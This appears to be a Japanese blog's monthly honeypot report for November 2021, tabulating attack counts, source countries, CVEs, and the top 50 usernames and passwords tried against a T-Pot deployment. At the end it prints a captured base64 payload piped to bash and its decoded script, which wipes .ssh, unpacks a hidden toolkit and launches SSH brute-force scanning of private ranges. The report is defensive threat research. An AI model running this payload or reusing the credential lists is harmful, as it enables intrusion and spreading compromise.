ハニーポット運用(月次報告:2021年11月)
今月のTopics
12月はX-masにかけてセキュリティイベントが目白押しになる。
2021 SANS Holiday Hack Challenge & KringleCon www.sans.org
Advent of Cyber 3 (2021) tryhackme.com
後は11月~12月にかけてはAmazonのサイバーマンデーが例年開催されていたが今年は実施されなかった。(「Amazonブラックフライデー」の中で実施された模様だ。) www.watch.impress.co.jp
来年はセール期間に併せて試験資格の申し込みを実施できればと思う。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2021年11月1日-2021年11月30日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Heralding | 874,290 | 583,536 |
| 2 | Cowrie | 763,008 | ▲120,701 |
| 3 | Honeytrap | 516,576 | ▲233,343 |
| 4 | Dionaea | 453,124 | 33,880 |
| 5 | Rdpy | 84,383 | 8,235 |
| 6 | Mailoney | 15,555 | 4,940 |
| 7 | Adbhoney | 14,496 | ▲1,293 |
| 8 | Tanner | 3,088 | 3,005 |
| 9 | Ciscoasa | 2,047 | 789 |
| 10 | CitrixHoneypot | 1,451 | ▲117 |
| 11 | ConPot | 1,249 | ▲138 |
| 12 | ElasticPot | 996 | ▲1,737 |
| 13 | Medpot | 135 | ▲576 |
- Result
- 10月に引き続き全体のアクセス数は低下した。
- Heraldingの検知数がCowrieを抜いて1位に浮上した。Dionaeaの検知数が低下し、smbの脆弱性を狙う攻撃は下火になっているのかもしれない。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Russia | 737,276 | 1(→) |
| 2 | Netherlands | 607,689 | 2(→) |
| 3 | China | 261,468 | 3(→) |
| 4 | United States | 194,351 | 4(→) |
| 5 | United Kingdom | 123,493 | 圏外(↑) |
| 6 | Brazil | 106,915 | 7(↑) |
| 7 | Ukraine | 74,093 | 19(↑) |
| 8 | Vietnam | 68,156 | 6(↓) |
| 9 | India | 53,357 | 5(↓) |
| 10 | France | 37,557 | 圏外(↑) |
| 11 | Singapore | 27,598 | 17(↑) |
| 12 | Sweden | 26,310 | 13(↑) |
| 13 | Japan | 24,783 | 11(↓) |
| 14 | Indonesia | 23,771 | 9(↓) |
| 15 | Latvia | 23,028 | 12(↓) |
| 16 | Iran | 21,049 | 圏外(↑) |
| 17 | Mexico | 19,777 | 17(→) |
| 18 | Republic of Lithuania | 18,816 | 圏外(↑) |
| 19 | Taiwan | 14,475 | 10(↓) |
| 20 | Venezuela | 12,985 | 圏外(↑) |
- Result
- 英国、イラン、リトアニア共和国からのアクセスが増加していた。
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 1,442,569 |
| 2 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 793 |
| 3 | CVE-2020-11910 | 45 |
| 4 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 24 |
| 5 | CVE-2014-2321 CVE-2014-2321 | 3 |
- Result
- 特記事項なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 101,532 |
| 2 | sa | 28,492 |
| 3 | admin | 4,187 |
| 4 | user | 3,470 |
| 5 | 22 | 1,341 |
| 6 | hadoop | 1,095 |
| 7 | (empty) | 1,067 |
| 8 | postgres | 832 |
| 9 | 2Wire | 677 |
| 10 | !root | 674 |
| 11 | test | 602 |
| 12 | anonymous | 507 |
| 13 | www | 491 |
| 14 | ftp | 489 |
| 15 | Admin | 467 |
| 16 | db | 459 |
| 17 | administrator | 456 |
| 18 | web | 455 |
| 19 | wwwroot | 432 |
| 20 | user123 | 415 |
| 21 | data | 414 |
| 22 | knockknockwhosthere | 414 |
| 23 | www-data | 410 |
| 24 | support | 374 |
| 25 | 0 | 360 |
| 26 | 666666 | 357 |
| 27 | debug | 339 |
| 28 | adm | 338 |
| 29 | blank | 337 |
| 30 | unknown | 325 |
| 31 | nproc | 267 |
| 32 | pi | 238 |
| 33 | mos | 134 |
| 34 | oracle | 132 |
| 35 | ubuntu | 116 |
| 36 | guest | 100 |
| 37 | Sato | 95 |
| 38 | mysql | 91 |
| 39 | server | 81 |
| 40 | ftpuser | 71 |
| 41 | git | 66 |
| 42 | ubnt | 55 |
| 43 | sh | 47 |
| 44 | dev | 41 |
| 45 | nginx | 41 |
| 46 | miner | 39 |
| 47 | minecraft | 37 |
| 48 | dell | 34 |
| 49 | nick | 34 |
| 50 | default | 32 |
- Result
- 特記事項なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 26,789 |
| 2 | (empty) | 3,724 |
| 3 | 1 | 1,588 |
| 4 | root | 1,419 |
| 5 | password | 1,408 |
| 6 | 123456 | 1,078 |
| 7 | blank | 1,019 |
| 8 | 12345 | 766 |
| 9 | 12345678 | 760 |
| 10 | 123 | 524 |
| 11 | 666666 | 511 |
| 12 | Samantha | 491 |
| 13 | 1234 | 486 |
| 14 | user | 485 |
| 15 | 0 | 482 |
| 16 | Password | 450 |
| 17 | knockknockwhosthere | 420 |
| 18 | 00000000 | 408 |
| 19 | master | 389 |
| 20 | support | 380 |
| 21 | ubnt | 376 |
| 22 | alpine | 364 |
| 23 | hi3518 | 353 |
| 24 | backup | 341 |
| 25 | unknown | 339 |
| 26 | !ishtar | 337 |
| 27 | synnet | 336 |
| 28 | 111111 | 323 |
| 29 | test | 296 |
| 30 | zaq12wsx | 264 |
| 31 | nproc | 261 |
| 32 | 1q2w3e4r | 251 |
| 33 | abc123 | 251 |
| 34 | musicman | 241 |
| 35 | 123456789 | 231 |
| 36 | qwerty | 225 |
| 37 | 1qaz2wsx | 224 |
| 38 | Passw0rd | 212 |
| 39 | 1234567 | 210 |
| 40 | 000000 | 207 |
| 41 | system | 194 |
| 42 | admin123 | 192 |
| 43 | 1234567890 | 176 |
| 44 | 123123 | 171 |
| 45 | 123qwe | 170 |
| 46 | iloveyou | 169 |
| 47 | passw0rd | 163 |
| 48 | Jennifer | 161 |
| 49 | 123qwe!@# | 158 |
| 50 | pass | 158 |
- Result
- Krane Malware関連のアクセスは多くは無いが今月も観測していた。
⑥今月のmasscanとZmap
masscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
ブラックフライデー中のため「サイバー術 プロに学ぶサイバーセキュリティ」を購入した。現在通読中。 book.mynavi.jp
来月で今年も終わり。今年受験予定だったセキュリティ資格は何もすすんでいない。
IPアドレス:221[.]195[.]1[.]201
Payload :
sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA=" | base64 --decode | bash
↓
文字コード部分をPrintable形式にすると以下になる。
↓
#!/bin/bash cd /tmp rm -rf .ssh rm -rf .mountfs rm -rf .X13-unix rm -rf .X17-unix mkdir .X17-unix cd .X17-unix mv /var/tmp/dota.tar.gz dota.tar.gz tar xf dota.tar.gz sleep 3s && cd /tmp/.X17-unix/.rsync/c nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1& sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1& sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1& exit 0
